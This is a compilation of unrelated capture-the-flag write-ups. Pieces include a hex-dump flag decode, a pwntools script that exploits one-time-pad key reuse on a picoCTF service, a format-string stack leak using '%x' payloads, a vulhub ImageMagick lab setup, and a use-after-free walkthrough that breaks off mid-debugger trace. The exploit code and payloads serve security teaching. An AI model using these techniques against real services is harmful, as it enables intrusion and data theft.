65 30 43 52 6b 31 74 4c 6b 6e 45 64 6d 71 6e 63 2f 59 6f 56 45 45 2b 59 2b 54 4b 6e 6b 51 55 51 31 30 54 2f 79 66 48 53 4c 74 2b 41 42 65 6d .........../.jRAzSvnJe0CRk1tLknEdmqnc/YoVEE+Y+TKnkQUQ10T/yfHSLt+ABem 000100dc: 15 14 13 12 c7 03 00 00 28 d0 5b 21 00 6d 32 45 41 6a 76 50 5a 47 66 47 57 41 62 6d 4c 67 78 68 4b 5a 46 57 64 64 79 62 4a 35 39 74 6f 65 66 57 48 47 74 48 61 4a 66 2f 61 73 79 68 39 4c 57 52 5a 78 57 6f ........(.[!.m2EAjvPZGfGWAbmLgxhKZFWddybJ59toefWHGtHaJf/asyh9LWRZxWo 00010120: 15 14 13 12 c8 03 00 00 f1 6a f0 5c 00 4b 48 72 2b 61 4f 49 4d 6b 50 54 34 53 39 6f 5a 34 34 61 65 71 30 61 78 70 71 4b 45 48 36 2b 69 52 5a 33 66 50 6e 6e 77 76 5a 65 37 2f 4d 69 32 36 77 63 55 6b 56 78 .........j.\.KHr+aOIMkPT4S9oZ44aeq0axpqKEH6+iRZ3fPnnwvZe7/Mi26wcUkVx 00010164: 15 14 13 12 c9 03 00 00 ce 05 cf 1b 00 6c 77 5a 53 43 63 75 65 58 41 39 39 57 4a 66 5a 33 55 30 58 2f 4a 39 46 64 41 2b 41 6e 4d 58 35 47 31 76 30 42 46 64 6c 51 65 73 37 56 79 41 56 7a 4d 42 61 59 71 79 .............lwZSCcueXA99WJfZ3U0X/J9FdA+AnMX5G1v0BFdlQes7VyAVzMBaYqy 000101a8: 15 14 13 12 ca 03 00 00 42 da 1d 0b 00 35 62 74 47 50 59 76 5a 47 39 52 66 70 73 30 64 4d 38 66 49 64 65 51 68 47 77 49 32 6e 6d 46 66 2f 75 64 68 67 73 55 66 6b 68 55 50 39 64 49 59 36 41 45 70 4b 72 66 ........B....5btGPYvZG9Rfps0dM8fIdeQhGwI2nmFf/udhgsUfkhUP9dIY6AEpKrf 000101ec: 15 14 13 12 cb 03 00 00 a0 8e 67 19 00 46 77 47 69 5a 48 38 32 53 46 70 79 76 2b 6c 42 35 70 31 6d 38 63 79 6e 30 64 61 48 31 6d 67 44 31 6a 36 36 63 72 6d 4c 6c 45 43 62 55 45 39 47 78 70 52 57 7a 63 71 ..........g..FwGiZH82SFpyv+lB5p1m8cyn0daH1mgD1j66crmLlECbUE9GxpRWzcq 00010230: 15 14 13 12 cc 03 00 00 82 f4 4b 0b 00 53 48 2b 73 6c 5a 48 78 41 4e 67 7a 63 43 4e 34 6f 74 53 5a 74 2b 4c 38 59 4d 45 39 71 68 6a 37 59 34 6a 57 6d 34 37 6c 76 2b 42 4a 63 46 4b 43 6f 48 6a 34 68 6c 67 ..........K..SH+slZHxANgzcCN4otSZt+L8YME9qhj7Y4jWm47lv+BJcFKCoHj4hlg 00010274: 15 14 13 12 cd 03 00 00 53 05 85 03 00 58 2b 36 79 72 57 63 79 33 72 6f 65 52 6a 4c 47 64 57 66 6d 31 55 4b 77 38 65 57 6d 38 58 50 75 52 39 78 76 4f 30 76 65 6e 73 56 46 68 54 69 63 64 47 55 73 6e 2f 52 ........S....X+6yrWcy3roeRjLGdWfm1UKw8eWm8XPuR9xvO0vensVFhTicdGUsn/R 000102b8: 15 14 13 12 ce 03 00 00 a8 ce 91 1f 00 52 53 52 50 6e 79 44 41 4a 59 5a 30 45 65 64 70 30 6c 67 48 66 58 42 33 6d 73 71 73 54 45 62 55 42 79 32 6b 31 76 6e 37 32 69 65 68 75 4b 62 70 38 73 44 75 30 6f 57 .............RSRPnyDAJYZ0Eedp0lgHfXB3msqsTEbUBy2k1vn72iehuKbp8sDu0oW 000102fc: 15 14 13 12 cf 03 00 00 68 fd 5b 47 00 49 42 4e 4f 43 48 63 4c 4f 47 73 78 50 73 52 45 39 2b 78 63 75 6a 70 65 44 4d 39 74 31 41 4d 68 59 79 38 79 45 44 72 6c 34 2f 73 51 73 70 72 52 64 31 68 4a 57 39 36 ........h.[G.IBNOCHcLOGsxPsRE9+xcujpeDM9t1AMhYy8yEDrl4/sQsprRd1hJW96 00010340: 15 14 13 12 d0 03 00 00 d7 b2 e8 04 00 7a 4a 70 48 44 75 7a 45 4f 62 7a 45 44 45 58 53 2b 4e 38 42 47 43 52 35 77 54 4a 6b 65 4a 71 65 46 6b 51 69 2f 7a 52 77 7a 47 41 72 62 71 61 45 43 65 30 4b 35 70 79 .............zJpHDuzEObzEDEXS+N8BGCR5wTJkeJqeFkQi/zRwzGArbqaECe0K5py 00010384: 15 14 13 12 d1 03 00 00 01 35 45 2f 00 4e 64 67 65 41 6f 4b 51 45 50 69 51 44 33 53 4f 49 33 55 34 59 41 5a 37 44 70 45 2f 69 6c 62 67 6b 4c 6f 51 73 56 7a 30 67 4e 31 54 6b 41 61 41 4e 4e 31 6a 7a 70 38 .........5E/.NdgeAoKQEPiQD3SOI3U4YAZ7DpE/ilbgkLoQsVz0gN1TkAaANN1jzp8 000103c8: 15 14 13 12 d2 03 00 00 45 c4 5e 32 00 6e 71 55 62 6c 51 47 50 35 68 6c 53 31 4b 47 52 56 4e 4f 57 62 41 42 48 30 61 68 41 56 30 56 77 76 44 63 78 49 45 44 4c 63 6c 79 6a 71 37 45 30 2b 75 63 30 48 4d 65 ........E.^2.nqUblQGP5hlS1KGRVNOWbABH0ahAV0VwvDcxIEDLclyjq7E0+uc0HMe 0001040c: 15 14 13 12 d3 03 00 00 77 9c 35 53 00 4c 67 66 41 42 30 49 57 5a 4b 68 6f 38 2b 7a 52 62 67 65 64 55 44 56 76 35 31 50 4d 42 77 6d 7a 6f 4f 5a 67 39 53 48 66 2f 36 6a 6f 45 2f 6f 47 31 61 72 57 68 66 4d ........w.5S.LgfAB0IWZKho8+zRbgedUDVv51PMBwmzoOZg9SHf/6joE/oG1arWhfM 00010450: 15 14 13 12 d4 03 00 00 4a 8c 13 58 00 72 55 41 6d 70 55 55 2f 4c 66 70 36 58 62 30 33 32 67 48 74 6e 54 79 35 77 41 78 59 52 32 4e 4d 36 45 34 5a 42 63 66 4b 75 6e 63 34 73 7a 4b 62 65 64 79 52 7a 2b 52 ........J..X.rUAmpUU/Lfp6Xb032gHtnTy5wAxYR2NM6E4ZBcfKunc4szKbedyRz+R 00010494: 15 14 13 12 d5 03 00 00 8b e7 0c 3d 00 44 64 50 34 74 31 30 38 78 56 69 38 73 2b 6a 6d 56 6c 54 50 46 6a 52 48 74 67 56 50 42 4e 56 38 72 6e 58 77 68 53 51 62 63 6d 72 69 56 54 6a 32 50 71 61 68 58 67 70 ...........=.DdP4t108xVi8s+jmVlTPFjRHtgVPBNV8rnXwhSQbcmriVTj2PqahXgp 000104d8: 15 14 13 12 d6 03 00 00 59 54 81 33 00 31 76 68 44 79 52 56 33 4f 68 71 75 77 6c 46 6a 5a 39 4c 2f 70 6a 6b 49 4a 70 6a 79 47 2b 51 65 70 6c 4e 68 70 34 31 58 53 47 71 6a 31 2b 44 5a 2f 4f 61 54 42 52 52 ........YT.3.1vhDyRV3OhquwlFjZ9L/pjkIJpjyG+QeplNhp41XSGqj1+DZ/OaTBRR 0001051c: 15 14 13 12 d7 03 00 00 49 a2 75 3d 00 4d 6b 6a 63 6d 73 48 31 4e 66 4f 75 4b 41 52 5a 77 78 70 65 4c 73 44 6f 4a 76 4f 52 77 34 4e 32 75 6e 42 48 72 63 61 31 63 74 64 63 58 68 5a 47 72 46 44 50 75 59 49 ........I.u=.MkjcmsH1NfOuKARZwxpeLsDoJvORw4N2unBHrca1ctdcXhZGrFDPuYI 00010560: 15 14 13 12 d8 03 00 00 f0 15 c9 48 00 70 54 6a 64 32 37 35 7a 31 35 59 7a 70 30 2f 56 35 4c 31 4d 56 77 63 6f 6d 6d 44 77 63 49 65 6a 6b 44 44 42 5a 58 44 75 68 6c 63 51 39 65 76 73 7a 73 77 55 69 55 41 ...........H.pTjd275z15Yzp0/V5L1MVwcommDwcIejkDDBZXDuhlcQ9evszswUiUA 000105a4: 15 14 13 12 d9 03 00 00 59 e3 82 10 00 52 6c 2f 75 39 30 4f 71 49 54 5a 46 34 67 54 46 53 67 74 59 2b 63 6a 2b 35 51 78 51 70 35 70 77 77 2f 4a 33 31 73 55 4c 39 30 33 4e 52 71 6a 59 47 73 37 33 78 34 6d ........Y....Rl/u90OqITZF4gTFSgtY+cj+5QxQp5pww/J31sUL903NRqjYGs73x4m 000105e8: 15 14 13 12 da 03 00 00 20 cb c6 17 00 74 2b 44 74 67 2b 74 30 44 79 72 46 4c 4b 6b 61 6c 6e 72 4a 75 63 35 51 32 4e 54 67 66 77 64 78 42 41 6e 71 34 57 4b 51 68 61 36 4e 57 52 75 79 37 31 32 38 48 57 50 ........ ....t+Dtg+t0DyrFLKkalnrJuc5Q2NTgfwdxBAnq4WKQha6NWRuy7128HWP 0001062c: 15 14 13 12 db 03 00 00 c7 5b a5 30 00 57 76 68 4e 2b 4b 4c 51 36 56 63 36 53 77 33 48 50 52 39 4c 78 33 4f 69 72 54 75 58 53 70 41 31 47 48 49 4e 5a 33 49 46 78 48 30 6b 64 4a 43 63 2f 4e 65 2f 47 75 71 .........[.0.WvhN+KLQ6Vc6Sw3HPR9Lx3OirTuXSpA1GHINZ3IFxH0kdJCc/Ne/Guq 00010670: 15 14 13 12 dc 03 00 00 b0 c8 65 06 00 32 63 59 38 7a 2f 36 38 4b 34 6f 72 5a 41 42 6f 76 59 4f 6b 6e 49 53 49 38 50 37 38 70 74 37 65 4e 45 63 66 69 6a 41 32 2f 58 55 44 6a 49 75 7a 66 77 67 4b 6e 47 70 ..........e..2cY8z/68K4orZABovYOknISI8P78pt7eNEcfijA2/XUDjIuzfwgKnGp 000106b4: 15 14 13 12 dd 03 00 00 8c cd b1 38 00 39 34 30 47 45 69 58 75 48 30 31 45 6d 77 4d 4c 41 67 64 42 50 4a 52 33 68 51 69 74 76 6a 2f 50 58 58 38 32 41 73 4e 2b 4d 44 56 42 4f 64 2b 69 59 6f 50 6e 36 30 4d ...........8.940GEiXuH01EmwMLAgdBPJR3hQitvj/PXX82AsN+MDVBOd+iYoPn60M 000106f8: 15 14 13 12 de 03 00 00 42 6f ec 22 00 59 51 65 62 71 7a 52 6a 73 69 62 43 31 54 70 45 65 65 75 32 52 64 48 30 2f 69 46 7a 68 4e 35 37 55 42 49 53 41 39 44 42 74 34 53 6d 70 6d 69 6d 6b 61 55 39 69 67 38 ........Bo.".YQebqzRjsibC1TpEeeu2RdH0/iFzhN57UBISA9DBt4SmpmimkaU9ig8 0001073c: 15 14 13 12 df 03 00 00 cd 47 d9 38 00 52 36 49 64 73 36 77 43 55 57 64 6b 51 68 52 4b 49 68 78 51 69 65 47 42 2f 43 45 5a 39 4f 56 4b 70 30 62 51 6e 4f 4e 7a 34 76 68 79 61 6b 65 61 69 31 6f 54 45 72 70 .........G.8.R6Ids6wCUWdkQhRKIhxQieGB/CEZ9OVKp0bQnONz4vhyakeai1oTErp 00010780: 15 14 13 12 e0 03 00 00 c3 a4 e0 40 00 64 6b 52 79 46 57 52 75 73 6a 33 6b 7a 73 4f 77 55 30 68 35 4d 37 49 47 51 5a 31 42 61 36 65 75 4e 61 41 6d 79 6c 74 4e 45 62 47 68 4f 42 2f 30 6e 33 6d 75 75 69 38 ...........@.dkRyFWRusj3kzsOwU0h5M7IGQZ1Ba6euNaAmyltNEbGhOB/0n3muui8 000107c4: 15 14 13 12 e1 03 00 00 c9 66 32 56 00 68 75 36 46 54 76 45 4f 4d 42 68 76 69 39 79 52 7a 31 50 6c 37 4b 69 74 7a 36 71 34 6b 57 6e 46 55 56 4e 4a 52 72 4d 50 41 56 49 4f 78 75 71 67 78 67 42 2f 39 41 38 .........f2V.hu6FTvEOMBhvi9yRz1Pl7Kitz6q4kWnFUVNJRrMPAVIOxuqgxgB/9A8 00010808: 15 14 13 12 e2 03 00 00 c4 79 2b 47 00 6c 66 59 2b 6c 50 67 48 38 67 53 6f 42 59 70 31 6a 65 35 47 77 43 57 46 68 4e 79 70 41 6c 62 2f 39 42 37 4a 6c 2f 4a 45 56 30 50 79 4e 69 54 45 59 32 53 69 34 37 7a .........y+G.lfY+lPgH8gSoBYp1je5GwCWFhNypAlb/9B7Jl/JEV0PyNiTEY2Si47z 0001084c: 15 14 13 12 e3 03 00 00 95 43 bd 41 00 71 63 42 30 67 2f 71 61 7a 36 7a 46 73 79 34 75 54 34 33 46 76 70 6f 51 4a 37 78 50 44 4f 56 59 45 31 39 2b 73 42 68 47 63 55 62 6f 71 70 6e 75 75 36 6f 62 70 2f 77 .........C.A.qcB0g/qaz6zFsy4uT43FvpoQJ7xPDOVYE19+sBhGcUboqpnuu6obp/w 00010890: 15 14 13 12 e4 03 00 00 d5 8c 80 0c 00 70 6c 6f 51 41 37 55 4b 48 69 69 59 76 4b 50 45 54 7a 58 63 68 75 59 4b 47 6a 76 52 31 68 43 32 73 59 6f 61 59 4c 77 48 32 68 65 35 7a 45 78 44 69 4a 2f 4e 54 2f 37 .............ploQA7UKHiiYvKPETzXchuYKGjvR1hC2sYoaYLwH2he5zExDiJ/NT/7 000108d4: 15 14 13 12 e5 03 00 00 41 71 c1 06 00 6c 2b 55 63 46 49 6e 59 44 2b 65 4a 6b 77 71 33 67 63 35 46 78 6e 38 61 45 6b 45 33 54 76 74 74 44 53 36 4a 30 63 79 7a 34 65 31 65 2b 72 59 62 37 43 69 70 55 38 41 ........Aq...l+UcFInYD+eJkwq3gc5Fxn8aEkE3TvttDS6J0cyz4e1e+rYb7CipU8A 00010918: 15 14 13 12 e6 03 00 00 0a 11 7d 50 00 34 58 36 69 6b 78 4a 7a 66 6e 55 47 77 79 32 2f 54 4e 51 30 36 34 35 79 7a 68 65 77 4e 47 36 47 41 45 62 58 68 70 6f 37 37 36 72 34 4f 4c 73 4e 71 62 34 47 64 4c 63 ..........}P.4X6ikxJzfnUGwy2/TNQ0645yzhewNG6GAEbXhpo776r4OLsNqb4GdLc 0001095c: 15 14 13 12 e7 03 00 00 55 58 f2 1d 00 72 48 75 52 6e 57 4e 79 5a 38 78 46 4d 63 4c 58 75 72 43 7a 70 54 58 41 4d 6e 4f 47 73 30 67 30 55 56 75 6f 41 36 64 75 47 75 2f 64 58 63 75 4f 4a 2f 50 69 74 4e 53 ........UX...rHuRnWNyZ8xFMcLXurCzpTXAMnOGs0g0UVuoA6duGu/dXcuOJ/PitNS ``` What this looks like is: ```c typedef struct { uint32_t magic; // Equal to 0x12131415 uint32_t id; // Running index uint32_t checksum; // Maybe a checksum of an unknown format uint8_t bool_val; // Unknown uint8_t msg[37]; // Message } ``` If we take a look at the `bool_val` field, we see that there's only one entry which has this set to `1`: ```console root@kali:/media/sf_CTFs/matrix/Fly_Me_To_The_Moon# cat message.gz | xxd -g 1 -c 68 | awk '$14 == "01" { print $0 }' 0000e42c: 15 14 13 12 5b 03 00 00 00 e1 0b 5e 01 52 6b 78 42 52 31 39 43 55 6b 6c 4f 52 31 39 43 51 55 4e 4c 58 31 4e 4a 54 6b 46 55 55 6b 45 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....[......^.RkxBR19CUklOR19CQUNLX1NJTkFUUkE=....................... ``` Let's run the string through base 64: ```console root@kali:/media/sf_CTFs/matrix/Fly_Me_To_The_Moon# echo RkxBR19CUklOR19CQUNLX1NJTkFUUkE= | base64 -d FLAG_BRING_BACK_SINATRA ```
sec-knowleage
# Easy Peasy Category: Crypto, 40 points ## Description > A one-time pad is unbreakable, but can you manage to recover the flag? (Wrap with picoCTF{}) ```python #!/usr/bin/python3 -u import os.path KEY_FILE = "key" KEY_LEN = 50000 FLAG_FILE = "flag" def startup(key_location): flag = open(FLAG_FILE).read() kf = open(KEY_FILE, "rb").read() start = key_location stop = key_location + len(flag) key = kf[start:stop] key_location = stop result = list(map(lambda p, k: "{:02x}".format(ord(p) ^ k), flag, key)) print("This is the encrypted flag!\n{}\n".format("".join(result))) return key_location def encrypt(key_location): ui = input("What data would you like to encrypt? ").rstrip() if len(ui) == 0 or len(ui) > KEY_LEN: return -1 start = key_location stop = key_location + len(ui) kf = open(KEY_FILE, "rb").read() if stop >= KEY_LEN: stop = stop % KEY_LEN key = kf[start:] + kf[:stop] else: key = kf[start:stop] key_location = stop result = list(map(lambda p, k: "{:02x}".format(ord(p) ^ k), ui, key)) print("Here ya go!\n{}\n".format("".join(result))) return key_location print("******************Welcome to our OTP implementation!******************") c = startup(0) while c >= 0: c = encrypt(c) ``` ## Solution When we connect to the attached service, we first get the encrypted flag, then are able to encrypt as much data as we want: ```console ┌──(user@kali)-[/media/sf_CTFs/pico/Easy_Peasy] └─$ nc mercury.picoctf.net 20266 ******************Welcome to our OTP implementation!****************** This is the encrypted flag! 5b1e564b6e415c0e394e0401384b08553a4e5c597b6d4a5c5a684d50013d6e4b What data would you like to encrypt? test Here ya go! 15532f0c What data would you like to encrypt? ``` From the service implementation, we see that it uses a XOR pad of length 50000 to encrypt the input. This should be unbreakable if it's used as a one-time-pad, but in our case the service performs a wrap-around and reuses the same pad for every 50000 characters. So, to retrieve the XOR values used to encrypt the flag, we just need to cause a wraparound, allowing our known input to be re-encrypted with the same XOR values. Since we know the input, we can XOR it with the encrypted result to get the key. Then, it's just a matter of XOR-ing the key with the encrypted flag. In fact, we can even make this a bit more efficient by re-encrypting the same encrypted flag with the XOR stream that was used to originally encrypt it. This should result in the plaintext flag. The script: ```python from pwn import * KEY_LEN = 50000 MAX_CHUNK = 1000 r = remote("mercury.picoctf.net", 20266) r.recvuntil("This is the encrypted flag!\n") flag = r.recvlineS(keepends = False) log.info(f"Flag: {flag}") bin_flag = unhex(flag) counter = KEY_LEN - len(bin_flag) with log.progress('Causing wrap-around') as p: while counter > 0: p.status(f"{counter} bytes left") chunk_size = min(MAX_CHUNK, counter) r.sendlineafter("What data would you like to encrypt? ", "a" * chunk_size) counter -= chunk_size r.sendlineafter("What data would you like to encrypt? ", bin_flag) r.recvlineS() log.success("The flag: {}".format(unhex(r.recvlineS()))) ``` Output: ```console ┌──(user@kali)-[/media/sf_CTFs/pico/Easy_Peasy] └─$ python3 solve.py [+] Opening connection to mercury.picoctf.net on port 20266: Done [*] Flag: 5b1e564b6e415c0e394e0401384b08553a4e5c597b6d4a5c5a684d50013d6e4b [+] Causing wrap-around: Done [+] The flag: b'99072996e6f7d397f6ea0128b4517c23' ```
sec-knowleage
# My first service I (pwn 100) ###ENG [PL](#pl-version) In the task we can connect to a service via netcat: ``` Welcome to my first service Please input the secret key: ``` If we provide some string, the server sends it back if it is incorrect. However, apparently server was doing `printf(our_data)` and therefore we could use `string format attack`. If we provide some magic formatting parameters like `%s` or `%d` the `printf` function will try to access parameters from the stack, which means we can read data from the stack. So we did: ``` nc6 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 35000 nc6: using stream socket Welcome to my first service Please input the secret key: %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x Invalid key: 0 1 0 0 0 a 0 454b4f7b 4c614269 67426566 3072647d 0 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 ``` Where `%x` returns hex encoded integers from the stack. Now we just have to decode the results: (each pair of digits we treat as hex integer and we convert it to ascii character) ```python x = '454b4f7b4c614269674265663072647d02578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578' print("".join([chr(int(c,16)) for c in [x[i]+x[i+1] for i in range(0,len(x)-1,2)]])) ``` Which gives us: ``` 'EKO{LaBigBef0rd}\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W' ``` ###PL version W zadaniu dostajemy adres usługi do połączenia się za pomocą netcata: ``` Welcome to my first service Please input the secret key: ``` Jeśli podamy jakiś string, serwer odsyła go z informacją że jest błędny. Niemniej wyglądało na to, że serwer wykonywał `printf(nasze_dane)` a tym samym mogliśmy wykorzystać `string format attack`. Jeśli podamy pewne specjalne parametry w stringu jak `%s` albo `%d` funkcja `printf` będzie próbowała załadować tam wartości parametrów ze stosu, co oznacza, że możemy w ten sposób czytać dane na stosie. I to właśnie zrobiliśmy: ``` nc6 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 35000 nc6: using stream socket Welcome to my first service Please input the secret key: %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x Invalid key: 0 1 0 0 0 a 0 454b4f7b 4c614269 67426566 3072647d 0 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 20257820 25782025 78202578 ``` Gdzie `%x` zwraca integera ze stosu w postaci heksadecymalnej. Teraz zostało jedynie zdekodować wynik: (każdą parę cyfr traktujemy jako osobną liczbę heksadecymalną i zamieniamy na reprezentacje ascii) ```python x = '454b4f7b4c614269674265663072647d02578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578202578' print("".join([chr(int(c,16)) for c in [x[i]+x[i+1] for i in range(0,len(x)-1,2)]])) ``` Co daje: ``` 'EKO{LaBigBef0rd}\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W\x82\x02W' ```
sec-knowleage
version: '2' services: web: image: vulhub/imagemagick:7.1.0-49-php command: php -t /var/www/html -S 0.0.0.0:8080 volumes: - ./index.php:/var/www/html/index.php ports: - "8080:8080"
sec-knowleage
# Unsubscriptions Are Free Category: Binary Exploitation, 100 points ## Description > Check out my new video-game and spaghetti-eating streaming channel on Twixer! ```c #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <ctype.h> #define FLAG_BUFFER 200 #define LINE_BUFFER_SIZE 20 typedef struct { uintptr_t (*whatToDo)(); char *username; } cmd; char choice; cmd *user; void hahaexploitgobrrr(){ char buf[FLAG_BUFFER]; FILE *f = fopen("flag.txt","r"); fgets(buf,FLAG_BUFFER,f); fprintf(stdout,"%s\n",buf); fflush(stdout); } char * getsline(void) { getchar(); char * line = malloc(100), * linep = line; size_t lenmax = 100, len = lenmax; int c; if(line == NULL) return NULL; for(;;) { c = fgetc(stdin); if(c == EOF) break; if(--len == 0) { len = lenmax; char * linen = realloc(linep, lenmax *= 2); if(linen == NULL) { free(linep); return NULL; } line = linen + (line - linep); linep = linen; } if((*line++ = c) == '\n') break; } *line = '\0'; return linep; } void doProcess(cmd* obj) { (*obj->whatToDo)(); } void s(){ printf("OOP! Memory leak...%p\n",hahaexploitgobrrr); puts("Thanks for subsribing! I really recommend becoming a premium member!"); } void p(){ puts("Membership pending... (There's also a super-subscription you can also get for twice the price!)"); } void m(){ puts("Account created."); } void leaveMessage(){ puts("I only read premium member messages but you can "); puts("try anyways:"); char* msg = (char*)malloc(8); read(0, msg, 8); } void i(){ char response; puts("You're leaving already(Y/N)?"); scanf(" %c", &response); if(toupper(response)=='Y'){ puts("Bye!"); free(user); }else{ puts("Ok. Get premium membership please!"); } } void printMenu(){ puts("Welcome to my stream! ^W^"); puts("=========================="); puts("(S)ubscribe to my channel"); puts("(I)nquire about account deletion"); puts("(M)ake an Twixer account"); puts("(P)ay for premium membership"); puts("(l)eave a message(with or without logging in)"); puts("(e)xit"); } void processInput(){ scanf(" %c", &choice); choice = toupper(choice); switch(choice){ case 'S': if(user){ user->whatToDo = (void*)s; }else{ puts("Not logged in!"); } break; case 'P': user->whatToDo = (void*)p; break; case 'I': user->whatToDo = (void*)i; break; case 'M': user->whatToDo = (void*)m; puts("==========================="); puts("Registration: Welcome to Twixer!"); puts("Enter your username: "); user->username = getsline(); break; case 'L': leaveMessage(); break; case 'E': exit(0); default: puts("Invalid option!"); exit(1); break; } } int main(){ setbuf(stdout, NULL); user = (cmd *)malloc(sizeof(user)); while(1){ printMenu(); processInput(); //if(user){ doProcess(user); //} } return 0; } ``` A binary file was attached. ## Solution This program is a Twitter-clone with some tweet-related functionality. Reviewing the code, we can see a few things. First, we notice that the program leaks the address of `hahaexploitgobrrr` - the function that prints the flag. So we can be sure that we'll want to call it somehow. We can also see that `user` is allocated on the heap, and that we can free `user` by calling `i()`. Furthermore, due to `main()`'s implementation, we can still dereference `user` even after calling `i()` to free it. The attack is a simple heap exploit. We'll walk through an example using the debugger. Let's start by checking the heap address that's assigned to `user` during `main`'s initialization: ``` $eax : 0x0804c1a0 → 0x00000000 $ebx : 0x0804b000 → 0x0804af0c → 0x00000001 $ecx : 0x0 $edx : 0x4 $esp : 0xffffd990 → 0x00000004 $ebp : 0xffffd9a8 → 0x00000000 $esi : 0xf7fb5000 → 0x001e4d6c $edi : 0xf7fb5000 → 0x001e4d6c $eip : 0x08048d6f → <main+58> add esp, 0x10 $eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification] $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0xffffd990│+0x0000: 0x00000004 ← $esp 0xffffd994│+0x0004: 0x00000000 0xffffd998│+0x0008: 0xffffda6c → 0xffffdbf4 → "LANG=en_IL" 0xffffd99c│+0x000c: 0x08048d49 → <main+20> add ebx, 0x22b7 0xffffd9a0│+0x0010: 0xffffd9c0 → 0x00000001 0xffffd9a4│+0x0014: 0x00000000 0xffffd9a8│+0x0018: 0x00000000 ← $ebp 0xffffd9ac│+0x001c: 0xf7deee46 → <__libc_start_main+262> add esp, 0x10 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ──── 0x8048d65 <main+48> sub esp, 0xc 0x8048d68 <main+51> push 0x4 0x8048d6a <main+53> call 0x8048620 <malloc@plt> → 0x8048d6f <main+58> add esp, 0x10 0x8048d72 <main+61> mov edx, eax 0x8048d74 <main+63> mov eax, 0x804b060 0x8048d7a <main+69> mov DWORD PTR [eax], edx 0x8048d7c <main+71> call 0x8048b2d <printMenu> 0x8048d81 <main+76> call 0x8048bd5 <processInput> ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "vuln", stopped 0x8048d6f in main (), reason: SINGLE STEP ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── [#0] 0x8048d6f → main() ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef> ``` The address is saved in `eax`: `0x0804c1a0`. Now, we'll add a breakpoint to `i` and request to free the `user` buffer: ``` $eax : 0x0 $ebx : 0x0804b000 → 0x0804af0c → 0x00000001 $ecx : 0x0804c010 → 0x00000001 $edx : 0x0 $esp : 0xffffd950 → 0x0804c1a0 → 0x00000000 $ebp : 0xffffd978 → 0xffffd988 → 0xffffd9a8 → 0x00000000 $esi : 0xf7fb5000 → 0x001e4d6c $edi : 0xf7fb5000 → 0x001e4d6c $eip : 0x08048aff → <i+128> add esp, 0x10 $eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification] $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0xffffd950│+0x0000: 0x0804c1a0 → 0x00000000 ← $esp 0xffffd954│+0x0004: 0xffffd96b → 0xc0ce0059 ("Y"?) 0xffffd958│+0x0008: 0xf7fb5000 → 0x001e4d6c 0xffffd95c│+0x000c: 0x08048a8b → <i+12> add ebx, 0x2575 0xffffd960│+0x0010: 0xffffd998 → 0xffffd9a8 → 0x00000000 0xffffd964│+0x0014: 0xf7fe9740 → pop edx 0xffffd968│+0x0018: 0x5904b065 0xffffd96c│+0x001c: 0x15c0ce00 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ──── 0x8048af3 <i+116> or BYTE PTR [ebx+0xcec8300], cl 0x8048af9 <i+122> push eax 0x8048afa <i+123> call 0x80485d0 <free@plt> → 0x8048aff <i+128> add esp, 0x10 0x8048b02 <i+131> jmp 0x8048b16 <i+151> 0x8048b04 <i+133> sub esp, 0xc 0x8048b07 <i+136> lea eax, [ebx-0x2078] 0x8048b0d <i+142> push eax 0x8048b0e <i+143> call 0x8048630 <puts@plt> 